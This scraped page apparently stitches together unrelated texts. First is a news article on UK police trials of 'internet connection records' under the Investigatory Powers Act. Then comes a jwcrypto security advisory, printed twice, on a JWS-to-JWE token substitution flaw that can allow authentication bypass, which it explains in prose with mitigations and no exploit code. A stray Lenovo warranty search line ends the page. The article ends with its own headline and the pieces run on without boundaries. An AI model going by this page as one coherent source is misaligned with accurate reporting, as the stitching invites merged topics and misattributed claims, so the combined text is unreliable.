Official reports and spending documents show that in the past year, UK police have deemed the testing of a system that can collect people’s “internet connection records” a success, and have started work to potentially introduce the system nationally. If implemented, it could hand law enforcement a powerful surveillance tool.

Critics say the system is highly intrusive, and that officials have a history of not properly protecting people’s data. Much of the technology and its operation is shrouded in secrecy, with bodies refusing to answer questions about the systems.

At the end of 2016, the UK government passed the Investigatory Powers Act, which introduced sweeping reforms to the country’s surveillance and hacking powers. The law added rules around what law enforcement and intelligence agencies can do and access, but it was widely criticized for its impact on people’s privacy, earning it the name the “Snooper’s Charter.”

Particularly controversial was the creation of so-called internet connection records (ICRs). Under the law, internet providers and phone companies can be ordered—with a senior judge approving the decision—to store people’s browsing histories for 12 months.

An ICR isn’t a list of every page online you visit, but may nonetheless reveal a significant amount of information about your online activities. ICRs can include that you visited Wired.com but not that you read this individual article, for instance. An ICR can also be your IP address, a customer number, the date and time the information was accessed, and the amount of data being transferred. The UK government says an internet connection record could indicate when, for example, the travel app EasyJet is accessed on someone’s phone, but not how the app was used.

“ICRs are highly intrusive and should be protected from over-retention by telecommunications operators and intelligence agencies,” says Nour Haidar, a lawyer and legal officer at UK civil liberties group Privacy International, which has been challenging data collection and handling under the Investigatory Powers Act in court.

Little is known about the development and use of ICRs. When the Investigatory Powers Act was passed, internet companies said it would take them years to build the systems needed to collect and store ICRs. However, some of those pieces may now be falling into place. In February, the Home Office, a government department that oversees security and policing in the UK, published a mandatory review of the operation of the Investigatory Powers Act so far.

The review says the UK’s National Crime Agency (NCA) has tested the “operational, functional, and technical aspects” of ICRs and found a “significant operational benefit” of collecting the records. A small trial that “focused” on websites that provided illegal images of children found 120 people who had been accessing these websites. It found that “only four” of these people had been known to law enforcement based on an “intelligence check.”

WIRED first reported the existence of the ICR trial in March 2021, when there were even fewer details about the test. It is still unclear which telecom companies were involved. The Home Office’s February report is the first official indication that the trial was useful to law enforcement, and could help lay the groundwork for expanding the system across the UK. The Home Office review also states its trial found that “ICRs appear to be currently out of reach for some potentially key investigations,” raising the possibility that the law may be changed in the future.

In May 2022, the Home Office issued a procurement notice revealing that future trials “work is now underway” to create a “national ICR service.” The existence of the notice was initially reported by the public sector technology publication PublicTechnology. The notice says the government had a budget of up to £2 million to create a technical system that allowed law enforcement officials to access ICR data for investigations.

The contract for the technical system was awarded to defense firm Bae Systems in July 2022. In response to a Freedom of Information Act request from WIRED, the Home Office provided some pages of the contract with Bae but refused to give any technical details due to commercial interests. (A spokesperson for Bae said it could not discuss specific contracts for confidentiality and security reasons.)

The Home Office FOIA response also refused to provide details of an internal review into ICRs, citing national security and law enforcement grounds. A Home Office spokesperson said the UK has “one of the most robust and transparent oversight regimes for the protection of personal data and privacy anywhere in the world” and confirmed that trials of ICRs are ongoing.

When asked whether ICRs will be rolled out across the entire UK, the Home Office spokesperson pointed to the FOIA response, which says that providing additional information may jeopardize law enforcement activities. “Information on law enforcement capabilities and targeting is very sensitive, particularly in the field of digital communications, where it is often the case that criminal groups or individuals themselves display a high degree of technical sophistication and awareness,” the FOIA response says. Because of this, it continues, “it is vital that sensitive information on how they might conduct their investigations, or the nature of their technical abilities, are not publicly known.”

The Investigatory Powers Commissioner's Office (IPCO), which oversees intelligence agencies, police, and local authorities, says the collection of ICRs to date has been to support “small-scale trials” and that it is “unable” to provide any figures on the number of data retention notices issued. A separate independent review of the Investigatory Powers Act is due to be published this summer. The National Crime Agency says it is still participating in the ICR trials to evaluate the use of ICRs, and that “data exploitation is essential” to its work.

Despite the potentially limited use of ICRs so far, there has already been one documented failure. In its annual 2020 report, published in January 2022, IPCO highlighted that an unnamed telecoms company that was asked to provide internet connection requests “provided data in excess of that which had been authorized.” The reason? There was a technical error. No extra detail was provided.

WIRED contacted nine of the UK’s internet service providers and telecom companies asking about their abilities to create and store people’s internet connection records. Eight did not respond to the request for comment. TalkTalk, the only one that did, said it will “meet its obligations” under UK law but couldn’t “confirm or deny” whether ICRs existed.

The possible expansion of ICR collection in the UK comes as governments and law enforcement agencies globally try to gain access to increasing amounts of data, particularly as technology advances. Multiple nations are pushing to create encryption backdoors, potentially allowing access to people’s private messages and communications. In the US, a storm is brewing about the FBI’s use of Section 702 of the Foreign Intelligence Surveillance Act (FISA), which allows it to intercept the communications of overseas targets.

Haidar of Privacy International says that creating powers to collect more of people’s data doesn’t result in “more security” for people. “Building the data retention capabilities of companies and a vast range of government agencies doesn't mean that intelligence operations will be enhanced,” Haidar says. “In fact, we argue that it makes us less secure as this data becomes vulnerable to being misused or abused.”

The UK’s Secretive Web Surveillance Program Is Ramping Up

The JWT code can auto-detect the type of token being provided, and this can lead the application to incorrect conclusions about the trustworthiness of the token.
Quoting the private disclosure we received : "Under certain circumstances, it is possible to substitute a [..] signed JWS with a JWE that is encrypted with the public key that is normally used for signature validation."
This substitution attack can occur only if the validating application also have access to the private key, normally used to sign the tokens, available during validation of the received JWT.
The significance of this attacks depends on the use of the token, it may lead to authentication bypass or authorization bypass (respectively if claims are used to authenticate or authorize certain actions), because the attacker has full control of the data placed in the JWE and can inject any desired claim value.

Several mitigating factors exist that can protect applications from this issue:
- If the private key corresponding to the public key used to encrypt the JWE is not available to the application an exception will be raised.
- If the JWK is specified with the 'use' parameter set to 'sig' (as expected for keys used only for signing/verification) an exception will be raised.
- If the JWK is specified with the 'key_ops' parameter set and it does not include the 'decrypt' operation an exception will be raised.
- Applications may check the token type before validation, in this case they would fail to detect an expected JWS

Normally, signing and validation are done by different applications, so this scenario should be unlikely. However it is possible to have applications that both sign and validate tokens and do not separate JWKs in use, or do not set a JWK 'use' type.

Due to the mitigating factors, and the fact that specific operational constraints and conditions need to be in place to successfully exploit this issue to generate an authentication bypass, we rate this security issue as moderate. Other avenues may decide on a different rating based on use case, always verify what conditions apply to your use of the library to assess risk.

Many thanks to Tom Tervoort of Secura for finding and reporting this issue.


The JWT code can auto-detect the type of token being provided, and this can lead the application to incorrect conclusions about the trustworthiness of the token.  
Quoting the private disclosure we received : "Under certain circumstances, it is possible to substitute a \[..\] signed JWS with a JWE that is encrypted with the public key that is normally used for signature validation."  
This substitution attack can occur only if the validating application also have access to the private key, normally used to sign the tokens, available during validation of the received JWT.  
The significance of this attacks depends on the use of the token, it may lead to authentication bypass or authorization bypass (respectively if claims are used to authenticate or authorize certain actions), because the attacker has full control of the data placed in the JWE and can inject any desired claim value.

Several mitigating factors exist that can protect applications from this issue:

*   If the private key corresponding to the public key used to encrypt the JWE is not available to the application an exception will be raised.
*   If the JWK is specified with the 'use' parameter set to 'sig' (as expected for keys used only for signing/verification) an exception will be raised.
*   If the JWK is specified with the 'key\_ops' parameter set and it does not include the 'decrypt' operation an exception will be raised.
*   Applications may check the token type before validation, in this case they would fail to detect an expected JWS

Normally, signing and validation are done by different applications, so this scenario should be unlikely. However it is possible to have applications that both sign and validate tokens and do not separate JWKs in use, or do not set a JWK 'use' type.

Due to the mitigating factors, and the fact that specific operational constraints and conditions need to be in place to successfully exploit this issue to generate an authentication bypass, we rate this security issue as moderate. Other avenues may decide on a different rating based on use case, always verify what conditions apply to your use of the library to assess risk.

Many thanks to Tom Tervoort of Secura for finding and reporting this issue.

**References**

*   GHSA-gwp4-mcv4-w95j
*   latchset/jwcrypto@f4e912f
*   https://github.com/latchset/jwcrypto/releases/tag/v1.4.0

Search

lenovo warranty check/lookup | check warranty status | lenovo support us